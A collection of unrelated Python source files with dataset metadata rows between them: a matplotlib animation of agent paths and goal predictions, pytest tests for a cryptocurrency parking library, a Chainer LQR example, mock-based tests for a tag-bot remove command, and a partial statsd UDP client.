self.goal_predictions[a][i].set_horizontalalignment('center')
self.goal_predictions[a][i].set_verticalalignment('center')
self.artists.append(self.goal_predictions[a][i])
self.agent_goal_connections[a][i] = plt.Line2D((start[1], goal[0]), (len(self.my_map[0]) - 1 - start[0], goal[1]), lw=2.5, color = goal_color)
self.artists.append(self.agent_goal_connections[a][i])
self.animation = animation.FuncAnimation(self.fig, self.animate_func,
init_func=self.init_func,
frames=int(self.T + 1) * 10,
interval=100,
blit=True)
def save(self, file_name, speed):
self.animation.save(
file_name,
fps=10 * speed,
dpi=200,
savefig_kwargs={"pad_inches": 0})
@staticmethod
def show():
plt.show()
def init_func(self):
for p in self.patches:
self.ax.add_patch(p)
for a in self.artists:
self.ax.add_artist(a)
return self.patches + self.artists
def animate_func(self, t):
# per ogni agente
for a in range(len(self.paths)):
pos = self.get_state(t / 10, self.paths[a])
self.agents[a].center = (pos[0], pos[1])
self.agent_names[a].set_position((pos[0], pos[1] + 0.5))
# per ogni goal
for i in self.agent_goal_connections[a]:
timestep = floor(t/10)
if timestep not in self.predictions[a]:
continue
prediction = self.predictions[a][timestep][i]
# Linee
self.agent_goal_connections[a][i].set_data([pos[0], self.goals[i][0]], [pos[1], self.goals[i][1]])
self.agent_goal_connections[a][i].set_alpha(prediction)
# Percentuali
self.goal_predictions[a][i].set_text("{:.2f}".format(prediction*100))
self.goal_predictions[a][i].set_position([(pos[0] + self.goals[i][0])/2, (pos[1] + self.goals[i][1])/2])
self.goal_predictions[a][i].set_alpha(prediction)
# reset all colors
for _, agent in self.agents.items():
agent.set_facecolor(agent.original_face_color)
# check drive-drive collisions
agents_array = [agent for _, agent in self.agents.items()]
for i in range(0, len(agents_array)):
for j in range(i + 1, len(agents_array)):
d1 = agents_array[i]
d2 = agents_array[j]
pos1 = np.array(d1.center)
pos2 = np.array(d2.center)
if np.linalg.norm(pos1 - pos2) < 0.7:
d1.set_facecolor('red')
d2.set_facecolor('red')
print("COLLISION! (agent-agent) ({}, {}) at time {}".format(i, j, t/10))
return self.patches + self.artists
@staticmethod
def get_state(t, path):
if int(t) <= 0:
return np.array(path[0])
elif int(t) >= len(path):
return np.array(path[-1])
else:
pos_last = np.array(path[int(t) - 1])
pos_next = np.array(path[int(t)])
pos = (pos_next - pos_last) * (t - int(t)) + pos_last
return pos
| 41.706587
| 158
| 0.535822
|
from matplotlib.patches import Circle, Rectangle, ConnectionPatch
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import animation
from math import floor
Colors = ['green', 'purple', 'orange', 'red', 'blue', 'yellow']
class Animation:
def __init__(self, my_map, starts, goals, paths, predictions):
self.my_map = np.flip(np.transpose(my_map), 1)
self.predictions = predictions
self.starts = []
for start in starts:
self.starts.append((start[1], len(self.my_map[0]) - 1 - start[0]))
self.goals = []
for goal in goals:
self.goals.append((goal[1], len(self.my_map[0]) - 1 - goal[0]))
self.paths = []
if paths:
for path in paths:
self.paths.append([])
for loc in path:
self.paths[-1].append((loc[1], len(self.my_map[0]) - 1 - loc[0]))
aspect = len(self.my_map) / len(self.my_map[0])
self.fig = plt.figure(frameon=False, figsize=(4 * aspect, 4))
self.ax = self.fig.add_subplot(111, aspect='equal')
self.fig.subplots_adjust(left=0, right=1, bottom=0, top=1, wspace=None, hspace=None)
self.patches = []
self.artists = []
self.agents = dict()
self.agent_names = dict()
self.goal_predictions = dict()
self.agent_goal_connections = dict()
x_min = -0.5
y_min = -0.5
x_max = len(self.my_map) - 0.5
y_max = len(self.my_map[0]) - 0.5
plt.xlim(x_min, x_max)
plt.ylim(y_min, y_max)
plt.xticks(np.arange(x_min, x_max, 1))
plt.yticks(np.arange(y_min, y_max, 1))
plt.grid(color='0.85')
self.patches.append(Rectangle((x_min, y_min), x_max - x_min, y_max - y_min, facecolor='none', edgecolor='gray'))
for i in range(len(self.my_map)):
for j in range(len(self.my_map[0])):
if self.my_map[i][j]:
self.patches.append(Rectangle((i - 0.5, j - 0.5), 1, 1, facecolor='gray', edgecolor='gray'))
self.T = 0
for i, goal in enumerate(self.goals):
goal_color = Colors[i % len(Colors)]
self.patches.append(Rectangle((goal[0] - 0.25, goal[1] - 0.25), 0.5, 0.5, facecolor=goal_color,
edgecolor='black', alpha=0.5))
for a in range(len(self.paths)):
name = str(a)
self.agents[a] = Circle((starts[a][0], starts[a][1]), 0.3, facecolor=Colors[a % len(Colors)],
edgecolor='black')
self.agents[a].original_face_color = Colors[a % len(Colors)]
self.patches.append(self.agents[a])
self.T = max(self.T, len(paths[a]) - 1)
self.agent_names[a] = self.ax.text(starts[a][0], starts[a][1] + 0.25, name)
self.agent_names[a].set_horizontalalignment('center')
self.agent_names[a].set_verticalalignment('center')
self.artists.append(self.agent_names[a])
self.goal_predictions[a] = dict()
self.agent_goal_connections[a] = dict()
for i, goal in enumerate(self.goals):
goal_color = Colors[i % len(Colors)]
self.goal_predictions[a][i] = self.ax.text(goal[0], goal[1], str(i))
self.goal_predictions[a][i].set_horizontalalignment('center')
self.goal_predictions[a][i].set_verticalalignment('center')
self.artists.append(self.goal_predictions[a][i])
self.agent_goal_connections[a][i] = plt.Line2D((start[1], goal[0]), (len(self.my_map[0]) - 1 - start[0], goal[1]), lw=2.5, color = goal_color)
self.artists.append(self.agent_goal_connections[a][i])
self.animation = animation.FuncAnimation(self.fig, self.animate_func,
init_func=self.init_func,
frames=int(self.T + 1) * 10,
interval=100,
blit=True)
def save(self, file_name, speed):
self.animation.save(
file_name,
fps=10 * speed,
dpi=200,
savefig_kwargs={"pad_inches": 0})
@staticmethod
def show():
plt.show()
def init_func(self):
for p in self.patches:
self.ax.add_patch(p)
for a in self.artists:
self.ax.add_artist(a)
return self.patches + self.artists
def animate_func(self, t):
for a in range(len(self.paths)):
pos = self.get_state(t / 10, self.paths[a])
self.agents[a].center = (pos[0], pos[1])
self.agent_names[a].set_position((pos[0], pos[1] + 0.5))
for i in self.agent_goal_connections[a]:
timestep = floor(t/10)
if timestep not in self.predictions[a]:
continue
prediction = self.predictions[a][timestep][i]
self.agent_goal_connections[a][i].set_data([pos[0], self.goals[i][0]], [pos[1], self.goals[i][1]])
self.agent_goal_connections[a][i].set_alpha(prediction)
self.goal_predictions[a][i].set_text("{:.2f}".format(prediction*100))
self.goal_predictions[a][i].set_position([(pos[0] + self.goals[i][0])/2, (pos[1] + self.goals[i][1])/2])
self.goal_predictions[a][i].set_alpha(prediction)
for _, agent in self.agents.items():
agent.set_facecolor(agent.original_face_color)
agents_array = [agent for _, agent in self.agents.items()]
for i in range(0, len(agents_array)):
for j in range(i + 1, len(agents_array)):
d1 = agents_array[i]
d2 = agents_array[j]
pos1 = np.array(d1.center)
pos2 = np.array(d2.center)
if np.linalg.norm(pos1 - pos2) < 0.7:
d1.set_facecolor('red')
d2.set_facecolor('red')
print("COLLISION! (agent-agent) ({}, {}) at time {}".format(i, j, t/10))
return self.patches + self.artists
@staticmethod
def get_state(t, path):
if int(t) <= 0:
return np.array(path[0])
elif int(t) >= len(path):
return np.array(path[-1])
else:
pos_last = np.array(path[int(t) - 1])
pos_next = np.array(path[int(t)])
pos = (pos_next - pos_last) * (t - int(t)) + pos_last
return pos
| true
| true
|
790c5cd73f720c4705a7e0c57f532296b4321a6d
| 5,650
|
py
|
Python
|
test/unit/test_parkingy_things.py
|
hexter2018/sentinel
|
99dc1f1b6eeb49d2b98eddddb2c43d9e350940c9
|
[
"MIT"
] | null | null | null |
test/unit/test_parkingy_things.py
|
hexter2018/sentinel
|
99dc1f1b6eeb49d2b98eddddb2c43d9e350940c9
|
[
"MIT"
] | null | null | null |
test/unit/test_parkingy_things.py
|
hexter2018/sentinel
|
99dc1f1b6eeb49d2b98eddddb2c43d9e350940c9
|
[
"MIT"
] | null | null | null |
import pytest
import sys
import os
os.environ['SENTINEL_CONFIG'] = os.path.normpath(os.path.join(os.path.dirname(__file__), '../test_sentinel.conf'))
sys.path.append(os.path.normpath(os.path.join(os.path.dirname(__file__), '../../lib')))
@pytest.fixture
def valid_parking_address(network='mainnet'):
return 'yYe8KwyaUu5YswSYmB3q3ryx8XTUu9y7Ui' if (network == 'testnet') else 'XpjStRH8SgA6PjgebtPZqCa9y7hLXP767n'
@pytest.fixture
def invalid_parking_address(network='mainnet'):
return 'yYe8KwyaUu5YswSYmB3q3ryx8XTUu9y7Uj' if (network == 'testnet') else 'XpjStRH8SgA6PjgebtPZqCa9y7hLXP767m'
@pytest.fixture
def current_block_hash():
return '000001c9ba1df5a1c58a4e458fb6febfe9329b1947802cd60a4ae90dd754b534'
@pytest.fixture
def mn_list():
from masternode import Masternode
masternodelist_full = {
u'701854b26809343704ab31d1c45abc08f9f83c5c2bd503a9d5716ef3c0cda857-1': u' ENABLED 70201 yjaFS6dudxUTxYPTDB9BYd1Nv4vMJXm3vK 1474157572 82842 1474152618 71111 52.90.74.124:19999',
u'f68a2e5d64f4a9be7ff8d0fbd9059dcd3ce98ad7a19a9260d1d6709127ffac56-1': u' ENABLED 70201 yUuAsYCnG5XrjgsGvRwcDqPhgLUnzNfe8L 1474157732 1590425 1474155175 71122 [2604:a880:800:a1::9b:0]:19999',
u'656695ed867e193490261bea74783f0a39329ff634a10a9fb6f131807eeca744-1': u' ENABLED 70201 yepN97UoBLoP2hzWnwWGRVTcWtw1niKwcB 1474157704 824622 1474152571 71110 178.62.203.249:19999',
}
mnlist = [Masternode(vin, mnstring) for (vin, mnstring) in masternodelist_full.items()]
return mnlist
@pytest.fixture
def mn_status_good():
# valid masternode status enabled & running
status = {
"vin": "CTxIn(COutPoint(f68a2e5d64f4a9be7ff8d0fbd9059dcd3ce98ad7a19a9260d1d6709127ffac56, 1), scriptSig=)",
"service": "[2604:a880:800:a1::9b:0]:19999",
"pubkey": "yUuAsYCnG5XrjgsGvRwcDqPhgLUnzNfe8L",
"status": "Masternode successfully started"
}
return status
@pytest.fixture
def mn_status_bad():
# valid masternode but not running/waiting
status = {
"vin": "CTxIn(COutPoint(0000000000000000000000000000000000000000000000000000000000000000, 4294967295), coinbase )",
"service": "[::]:0",
"status": "Node just started, not yet activated"
}
return status
# ========================================================================
def test_valid_parking_address():
from parkinglib import is_valid_parking_address
main = valid_parking_address()
test = valid_parking_address('testnet')
assert is_valid_parking_address(main) is True
assert is_valid_parking_address(main, 'mainnet') is True
assert is_valid_parking_address(main, 'testnet') is False
assert is_valid_parking_address(test) is False
assert is_valid_parking_address(test, 'mainnet') is False
assert is_valid_parking_address(test, 'testnet') is True
def test_invalid_parking_address():
from parkinglib import is_valid_parking_address
main = invalid_parking_address()
test = invalid_parking_address('testnet')
assert is_valid_parking_address(main) is False
assert is_valid_parking_address(main, 'mainnet') is False
assert is_valid_parking_address(main, 'testnet') is False
assert is_valid_parking_address(test) is False
assert is_valid_parking_address(test, 'mainnet') is False
assert is_valid_parking_address(test, 'testnet') is False
def test_deterministic_masternode_elections(current_block_hash, mn_list):
winner = elect_mn(block_hash=current_block_hash, mnlist=mn_list)
assert winner == 'f68a2e5d64f4a9be7ff8d0fbd9059dcd3ce98ad7a19a9260d1d6709127ffac56-1'
winner = elect_mn(block_hash='00000056bcd579fa3dc9a1ee41e8124a4891dcf2661aa3c07cc582bfb63b52b9', mnlist=mn_list)
assert winner == '656695ed867e193490261bea74783f0a39329ff634a10a9fb6f131807eeca744-1'
def test_deterministic_masternode_elections(current_block_hash, mn_list):
from parkinglib import elect_mn
winner = elect_mn(block_hash=current_block_hash, mnlist=mn_list)
assert winner == 'f68a2e5d64f4a9be7ff8d0fbd9059dcd3ce98ad7a19a9260d1d6709127ffac56-1'
winner = elect_mn(block_hash='00000056bcd579fa3dc9a1ee41e8124a4891dcf2661aa3c07cc582bfb63b52b9', mnlist=mn_list)
assert winner == '656695ed867e193490261bea74783f0a39329ff634a10a9fb6f131807eeca744-1'
def test_parse_masternode_status_vin():
from parkinglib import parse_masternode_status_vin
status = mn_status_good()
vin = parse_masternode_status_vin(status['vin'])
assert vin == 'f68a2e5d64f4a9be7ff8d0fbd9059dcd3ce98ad7a19a9260d1d6709127ffac56-1'
status = mn_status_bad()
vin = parse_masternode_status_vin(status['vin'])
assert vin is None
def test_hash_function():
import parkinglib
sb_data_hex = '7b226576656e745f626c6f636b5f686569676874223a2037323639362c20227061796d656e745f616464726573736573223a2022795965384b77796155753559737753596d42337133727978385854557539793755697c795965384b77796155753559737753596d4233713372797838585455753979375569222c20227061796d656e745f616d6f756e7473223a202232352e37353030303030307c32352e3735303030303030222c202274797065223a20327d'
sb_hash = '7ae8b02730113382ea75cbb1eecc497c3aa1fdd9e76e875e38617e07fb2cb21a'
hex_hash = "%x" % parkinglib.hashit(sb_data_hex)
assert hex_hash == sb_hash
def test_blocks_to_seconds():
import parkinglib
from decimal import Decimal
precision = Decimal('0.001')
assert Decimal(parkinglib.blocks_to_seconds(0)) == Decimal(0.0)
assert Decimal(parkinglib.blocks_to_seconds(2)).quantize(precision) \
== Decimal(314.4).quantize(precision)
assert int(parkinglib.blocks_to_seconds(16616)) == 2612035
| 40.070922
| 380
| 0.777699
|
import pytest
import sys
import os
os.environ['SENTINEL_CONFIG'] = os.path.normpath(os.path.join(os.path.dirname(__file__), '../test_sentinel.conf'))
sys.path.append(os.path.normpath(os.path.join(os.path.dirname(__file__), '../../lib')))
@pytest.fixture
def valid_parking_address(network='mainnet'):
return 'yYe8KwyaUu5YswSYmB3q3ryx8XTUu9y7Ui' if (network == 'testnet') else 'XpjStRH8SgA6PjgebtPZqCa9y7hLXP767n'
@pytest.fixture
def invalid_parking_address(network='mainnet'):
return 'yYe8KwyaUu5YswSYmB3q3ryx8XTUu9y7Uj' if (network == 'testnet') else 'XpjStRH8SgA6PjgebtPZqCa9y7hLXP767m'
@pytest.fixture
def current_block_hash():
return '000001c9ba1df5a1c58a4e458fb6febfe9329b1947802cd60a4ae90dd754b534'
@pytest.fixture
def mn_list():
from masternode import Masternode
masternodelist_full = {
u'701854b26809343704ab31d1c45abc08f9f83c5c2bd503a9d5716ef3c0cda857-1': u' ENABLED 70201 yjaFS6dudxUTxYPTDB9BYd1Nv4vMJXm3vK 1474157572 82842 1474152618 71111 52.90.74.124:19999',
u'f68a2e5d64f4a9be7ff8d0fbd9059dcd3ce98ad7a19a9260d1d6709127ffac56-1': u' ENABLED 70201 yUuAsYCnG5XrjgsGvRwcDqPhgLUnzNfe8L 1474157732 1590425 1474155175 71122 [2604:a880:800:a1::9b:0]:19999',
u'656695ed867e193490261bea74783f0a39329ff634a10a9fb6f131807eeca744-1': u' ENABLED 70201 yepN97UoBLoP2hzWnwWGRVTcWtw1niKwcB 1474157704 824622 1474152571 71110 178.62.203.249:19999',
}
mnlist = [Masternode(vin, mnstring) for (vin, mnstring) in masternodelist_full.items()]
return mnlist
@pytest.fixture
def mn_status_good():
status = {
"vin": "CTxIn(COutPoint(f68a2e5d64f4a9be7ff8d0fbd9059dcd3ce98ad7a19a9260d1d6709127ffac56, 1), scriptSig=)",
"service": "[2604:a880:800:a1::9b:0]:19999",
"pubkey": "yUuAsYCnG5XrjgsGvRwcDqPhgLUnzNfe8L",
"status": "Masternode successfully started"
}
return status
@pytest.fixture
def mn_status_bad():
status = {
"vin": "CTxIn(COutPoint(0000000000000000000000000000000000000000000000000000000000000000, 4294967295), coinbase )",
"service": "[::]:0",
"status": "Node just started, not yet activated"
}
return status
def test_valid_parking_address():
from parkinglib import is_valid_parking_address
main = valid_parking_address()
test = valid_parking_address('testnet')
assert is_valid_parking_address(main) is True
assert is_valid_parking_address(main, 'mainnet') is True
assert is_valid_parking_address(main, 'testnet') is False
assert is_valid_parking_address(test) is False
assert is_valid_parking_address(test, 'mainnet') is False
assert is_valid_parking_address(test, 'testnet') is True
def test_invalid_parking_address():
from parkinglib import is_valid_parking_address
main = invalid_parking_address()
test = invalid_parking_address('testnet')
assert is_valid_parking_address(main) is False
assert is_valid_parking_address(main, 'mainnet') is False
assert is_valid_parking_address(main, 'testnet') is False
assert is_valid_parking_address(test) is False
assert is_valid_parking_address(test, 'mainnet') is False
assert is_valid_parking_address(test, 'testnet') is False
def test_deterministic_masternode_elections(current_block_hash, mn_list):
winner = elect_mn(block_hash=current_block_hash, mnlist=mn_list)
assert winner == 'f68a2e5d64f4a9be7ff8d0fbd9059dcd3ce98ad7a19a9260d1d6709127ffac56-1'
winner = elect_mn(block_hash='00000056bcd579fa3dc9a1ee41e8124a4891dcf2661aa3c07cc582bfb63b52b9', mnlist=mn_list)
assert winner == '656695ed867e193490261bea74783f0a39329ff634a10a9fb6f131807eeca744-1'
def test_deterministic_masternode_elections(current_block_hash, mn_list):
from parkinglib import elect_mn
winner = elect_mn(block_hash=current_block_hash, mnlist=mn_list)
assert winner == 'f68a2e5d64f4a9be7ff8d0fbd9059dcd3ce98ad7a19a9260d1d6709127ffac56-1'
winner = elect_mn(block_hash='00000056bcd579fa3dc9a1ee41e8124a4891dcf2661aa3c07cc582bfb63b52b9', mnlist=mn_list)
assert winner == '656695ed867e193490261bea74783f0a39329ff634a10a9fb6f131807eeca744-1'
def test_parse_masternode_status_vin():
from parkinglib import parse_masternode_status_vin
status = mn_status_good()
vin = parse_masternode_status_vin(status['vin'])
assert vin == 'f68a2e5d64f4a9be7ff8d0fbd9059dcd3ce98ad7a19a9260d1d6709127ffac56-1'
status = mn_status_bad()
vin = parse_masternode_status_vin(status['vin'])
assert vin is None
def test_hash_function():
import parkinglib
sb_data_hex = '7b226576656e745f626c6f636b5f686569676874223a2037323639362c20227061796d656e745f616464726573736573223a2022795965384b77796155753559737753596d42337133727978385854557539793755697c795965384b77796155753559737753596d4233713372797838585455753979375569222c20227061796d656e745f616d6f756e7473223a202232352e37353030303030307c32352e3735303030303030222c202274797065223a20327d'
sb_hash = '7ae8b02730113382ea75cbb1eecc497c3aa1fdd9e76e875e38617e07fb2cb21a'
hex_hash = "%x" % parkinglib.hashit(sb_data_hex)
assert hex_hash == sb_hash
def test_blocks_to_seconds():
import parkinglib
from decimal import Decimal
precision = Decimal('0.001')
assert Decimal(parkinglib.blocks_to_seconds(0)) == Decimal(0.0)
assert Decimal(parkinglib.blocks_to_seconds(2)).quantize(precision) \
== Decimal(314.4).quantize(precision)
assert int(parkinglib.blocks_to_seconds(16616)) == 2612035
| true
| true
|
790c5ceee140cc410ea703f768529c4f172a1fea
| 2,260
|
py
|
Python
|
examples/Boyd_lqr.py
|
msakai/chainer-differentiable-mpc
|
dba5712f42a684748515d9ad5e2ff2823516c88e
|
[
"MIT"
] | 10
|
2019-10-07T03:00:42.000Z
|
2022-01-14T01:49:14.000Z
|
examples/Boyd_lqr.py
|
msakai/chainer-differentiable-mpc
|
dba5712f42a684748515d9ad5e2ff2823516c88e
|
[
"MIT"
] | null | null | null |
examples/Boyd_lqr.py
|
msakai/chainer-differentiable-mpc
|
dba5712f42a684748515d9ad5e2ff2823516c88e
|
[
"MIT"
] | 6
|
2019-10-08T05:04:40.000Z
|
2022-02-28T09:40:54.000Z
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.2.1
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import sys
print(sys.path)
sys.path.append("../lqr")
from lqr_recursion import LqrRecursion
import chainer
import numpy as np
import matplotlib.pyplot as plt
T =51
f = None
n_state =3
n_ctrl =1
n_sc = n_ctrl +n_state
F =chainer.Variable(np.array([(np.array([[
1.0,0, 0, 1],
[1,1.0,0,0],
[0, 1, 1, 0]])) for i in range(T)])).reshape(T,1,n_state,n_sc,)
c = chainer.Variable(np.array([(np.array([0,0,0.0,0]).T) for i in range(T)])).reshape(T,1,n_sc,)
_C = np.array([np.array([[0,0 ,0,0],[0,0,0,0],[0,0,1.0,0],[0,0,0,1]]) for i in range(T-1)])
_C = np.append(_C , np.array([[0,0 ,0,0],[0,0,0,0],[0,0,1.0,0],[0,0,0,0.00000000000001]]))
C = chainer.Variable(_C).reshape(T,1,n_sc, n_sc)
x_init = chainer.Variable(np.array([0.5428, 0.7633,0.3504])).reshape(1,n_state)
C
test = LqrRecursion(x_init,C,c,F,f,T,n_state,n_ctrl)
Ks, ks = test.backward()
k1 =[]
k2 = []
fig, ax = plt.subplots()
for i in range(T-1):
k1.append(Ks[i][0][0][0].data)
k2.append(Ks[i][0][0][1].data)
major_ticks = np.arange(0,T, 2)
ax.grid(which = "major", axis = "x", color = "blue", alpha = 0.8,
linestyle = "--", linewidth = 1)
ax.grid(which = "major", axis = "y", color = "green", alpha = 0.8,
linestyle = "--", linewidth = 1)
ax.set_xticks(major_ticks)
ax.set_ylim(-0.5, 1.2)
ax.plot(k1)
ax.plot(k2)
ax.set_ylim(-2, 0)
ax.set_xlim(0,T)
x,u = test.solve_recursion()
# +
us = []
for i in range(T):
us.append(x[i][0][0].data)
fig, ax = plt.subplots()
ax.grid(which = "major", axis = "x", color = "blue", alpha = 0.8,
linestyle = "--", linewidth = 1)
# y軸に目盛線を設定
ax.grid(which = "major", axis = "y", color = "green", alpha = 0.8,
linestyle = "--", linewidth = 1)
major_ticks = np.arange(0, 20, 2)
ax.set_xticks(major_ticks)
ax.set_ylim(-2, 1)
ax.set_xlim(0, 20)
ax.plot(us, marker='.')
plt.show()
# -
Ks
Ks
len(Ks)
x
| 23.298969
| 96
| 0.567257
|
import sys
print(sys.path)
sys.path.append("../lqr")
from lqr_recursion import LqrRecursion
import chainer
import numpy as np
import matplotlib.pyplot as plt
T =51
f = None
n_state =3
n_ctrl =1
n_sc = n_ctrl +n_state
F =chainer.Variable(np.array([(np.array([[
1.0,0, 0, 1],
[1,1.0,0,0],
[0, 1, 1, 0]])) for i in range(T)])).reshape(T,1,n_state,n_sc,)
c = chainer.Variable(np.array([(np.array([0,0,0.0,0]).T) for i in range(T)])).reshape(T,1,n_sc,)
_C = np.array([np.array([[0,0 ,0,0],[0,0,0,0],[0,0,1.0,0],[0,0,0,1]]) for i in range(T-1)])
_C = np.append(_C , np.array([[0,0 ,0,0],[0,0,0,0],[0,0,1.0,0],[0,0,0,0.00000000000001]]))
C = chainer.Variable(_C).reshape(T,1,n_sc, n_sc)
x_init = chainer.Variable(np.array([0.5428, 0.7633,0.3504])).reshape(1,n_state)
C
test = LqrRecursion(x_init,C,c,F,f,T,n_state,n_ctrl)
Ks, ks = test.backward()
k1 =[]
k2 = []
fig, ax = plt.subplots()
for i in range(T-1):
k1.append(Ks[i][0][0][0].data)
k2.append(Ks[i][0][0][1].data)
major_ticks = np.arange(0,T, 2)
ax.grid(which = "major", axis = "x", color = "blue", alpha = 0.8,
linestyle = "--", linewidth = 1)
ax.grid(which = "major", axis = "y", color = "green", alpha = 0.8,
linestyle = "--", linewidth = 1)
ax.set_xticks(major_ticks)
ax.set_ylim(-0.5, 1.2)
ax.plot(k1)
ax.plot(k2)
ax.set_ylim(-2, 0)
ax.set_xlim(0,T)
x,u = test.solve_recursion()
us = []
for i in range(T):
us.append(x[i][0][0].data)
fig, ax = plt.subplots()
ax.grid(which = "major", axis = "x", color = "blue", alpha = 0.8,
linestyle = "--", linewidth = 1)
ax.grid(which = "major", axis = "y", color = "green", alpha = 0.8,
linestyle = "--", linewidth = 1)
major_ticks = np.arange(0, 20, 2)
ax.set_xticks(major_ticks)
ax.set_ylim(-2, 1)
ax.set_xlim(0, 20)
ax.plot(us, marker='.')
plt.show()
Ks
Ks
len(Ks)
x
| true
| true
|
790c5e3bc06dbbfc7cc0dd46b37ad7eaabe03919
| 282
|
py
|
Python
|
core/modules/handler/__init__.py
|
codacy-badger/nebula-2
|
81a257f6485da1899a2cb1df348a57332aa4b55c
|
[
"Apache-2.0"
] | null | null | null |
core/modules/handler/__init__.py
|
codacy-badger/nebula-2
|
81a257f6485da1899a2cb1df348a57332aa4b55c
|
[
"Apache-2.0"
] | null | null | null |
core/modules/handler/__init__.py
|
codacy-badger/nebula-2
|
81a257f6485da1899a2cb1df348a57332aa4b55c
|
[
"Apache-2.0"
] | null | null | null |
__all__ = ["main_handler",
"welcome",
"bad_words",
"admin_command",
"joke",
"send_nudes",
"custom_handler",
"delete_buttons",
"super_ban_handler"
]
from core.modules.handler import *
| 23.5
| 34
| 0.478723
|
__all__ = ["main_handler",
"welcome",
"bad_words",
"admin_command",
"joke",
"send_nudes",
"custom_handler",
"delete_buttons",
"super_ban_handler"
]
from core.modules.handler import *
| true
| true
|
790c5e409b73da6e783e80a037b3297ffd5fb732
| 2,047
|
py
|
Python
|
tests/tagtrain/test_remove.py
|
c17r/TagTrain
|
5aa1ca36439cc5e81d0c691f905a4bb879b78399
|
[
"MIT"
] | null | null | null |
tests/tagtrain/test_remove.py
|
c17r/TagTrain
|
5aa1ca36439cc5e81d0c691f905a4bb879b78399
|
[
"MIT"
] | 7
|
2020-03-24T17:54:31.000Z
|
2021-09-21T12:34:34.000Z
|
tests/tagtrain/test_remove.py
|
c17r/TagTrain
|
5aa1ca36439cc5e81d0c691f905a4bb879b78399
|
[
"MIT"
] | null | null | null |
from unittest.mock import MagicMock, patch, call
from tagtrain import data
from . import fake
from tagtrain.tagtrain.tt_remove import Remove
@patch('tagtrain.data.by_owner.remove_user_from_group')
def test_unknown_group(remove_user_from_group):
remove_user_from_group.side_effect = data.Group.DoesNotExist()
app, reply, message, match = fake.create_all()
Remove(app).run(reply, message, match)
remove_user_from_group.assert_called_once_with('AuthorName', 'GroupName', 'MemberName')
reply.append.assert_called_once_with('Group `GroupName` does not exist. Skipping.')
@patch('tagtrain.data.by_owner.remove_user_from_group')
def test_unknown_member(remove_user_from_group):
remove_user_from_group.side_effect = data.Member.DoesNotExist()
app, reply, message, match = fake.create_all()
Remove(app).run(reply, message, match)
remove_user_from_group.assert_called_once_with('AuthorName', 'GroupName', 'MemberName')
reply.append.assert_called_once_with('`MemberName` is not a Member of Group `GroupName`. Skipping.')
@patch('tagtrain.data.by_owner.remove_user_from_group')
def test_good(remove_user_from_group):
remove_user_from_group.return_value = fake.create_group(name='GroupName', member_count=99)
app, reply, message, match = fake.create_all()
Remove(app).run(reply, message, match)
remove_user_from_group.assert_called_once_with('AuthorName', 'GroupName', 'MemberName')
reply.append.assert_called_once_with('`MemberName` removed from Group `GroupName`, 99 total Members.')
@patch('tagtrain.data.by_owner.remove_user_from_group')
def test_good_no_members(remove_user_from_group):
remove_user_from_group.return_value = fake.create_group(name='GroupName', member_count=0)
app, reply, message, match = fake.create_all()
Remove(app).run(reply, message, match)
remove_user_from_group.assert_called_once_with('AuthorName', 'GroupName', 'MemberName')
reply.append.assert_called_once_with('`MemberName` removed from Group `GroupName`, 0 total Members.')
| 38.622642
| 106
| 0.778701
|
from unittest.mock import MagicMock, patch, call
from tagtrain import data
from . import fake
from tagtrain.tagtrain.tt_remove import Remove
@patch('tagtrain.data.by_owner.remove_user_from_group')
def test_unknown_group(remove_user_from_group):
remove_user_from_group.side_effect = data.Group.DoesNotExist()
app, reply, message, match = fake.create_all()
Remove(app).run(reply, message, match)
remove_user_from_group.assert_called_once_with('AuthorName', 'GroupName', 'MemberName')
reply.append.assert_called_once_with('Group `GroupName` does not exist. Skipping.')
@patch('tagtrain.data.by_owner.remove_user_from_group')
def test_unknown_member(remove_user_from_group):
remove_user_from_group.side_effect = data.Member.DoesNotExist()
app, reply, message, match = fake.create_all()
Remove(app).run(reply, message, match)
remove_user_from_group.assert_called_once_with('AuthorName', 'GroupName', 'MemberName')
reply.append.assert_called_once_with('`MemberName` is not a Member of Group `GroupName`. Skipping.')
@patch('tagtrain.data.by_owner.remove_user_from_group')
def test_good(remove_user_from_group):
remove_user_from_group.return_value = fake.create_group(name='GroupName', member_count=99)
app, reply, message, match = fake.create_all()
Remove(app).run(reply, message, match)
remove_user_from_group.assert_called_once_with('AuthorName', 'GroupName', 'MemberName')
reply.append.assert_called_once_with('`MemberName` removed from Group `GroupName`, 99 total Members.')
@patch('tagtrain.data.by_owner.remove_user_from_group')
def test_good_no_members(remove_user_from_group):
remove_user_from_group.return_value = fake.create_group(name='GroupName', member_count=0)
app, reply, message, match = fake.create_all()
Remove(app).run(reply, message, match)
remove_user_from_group.assert_called_once_with('AuthorName', 'GroupName', 'MemberName')
reply.append.assert_called_once_with('`MemberName` removed from Group `GroupName`, 0 total Members.')
| true
| true
|
790c5e8c77ccc8d864f5d6056fd6ac278203a09d
| 1,531
|
py
|
Python
|
statsd/client/udp.py
|
cclauss/pystatsd-1
|
1c90b9fdf322680e2625da659abc2aa5d79b5bff
|
[
"MIT"
] | null | null | null |
statsd/client/udp.py
|
cclauss/pystatsd-1
|
1c90b9fdf322680e2625da659abc2aa5d79b5bff
|
[
"MIT"
] | null | null | null |
statsd/client/udp.py
|
cclauss/pystatsd-1
|
1c90b9fdf322680e2625da659abc2aa5d79b5bff
|
[
"MIT"
] | 1
|
2020-11-01T04:03:38.000Z
|
2020-11-01T04:03:38.000Z
|
from __future__ import absolute_import, division, unicode_literals
import socket
from .base import StatsClientBase, PipelineBase
class Pipeline(PipelineBase):
def __init__(self, client):
super(Pipeline, self).__init__(client)
self._maxudpsize = client._maxudpsize
def _send(self):
data = self._stats.popleft()
while self._stats:
# Use popleft to preserve the order of the stats.
stat = self._stats.popleft()
if len(stat) + len(data) + 1 >= self._maxudpsize:
self._client._after(data)
data = stat
else:
data += '\n' + stat
self._client._after(data)
class StatsClient(StatsClientBase):
"""A client for statsd."""
def __init__(self, host='localhost', port=8125, prefix=None,
maxudpsize=512, ipv6=False):
"""Create a new client."""
fam = socket.AF_INET6 if ipv6 else socket.AF_INET
family, _, _, _, addr = socket.getaddrinfo(
host, port, fam, socket.SOCK_DGRAM)[0]
self._addr = addr
self._sock = socket.socket(family, socket.SOCK_DGRAM)
self._prefix = prefix
self._maxudpsize = maxudpsize
def _send(self, data):
"""Send data to statsd."""
try:
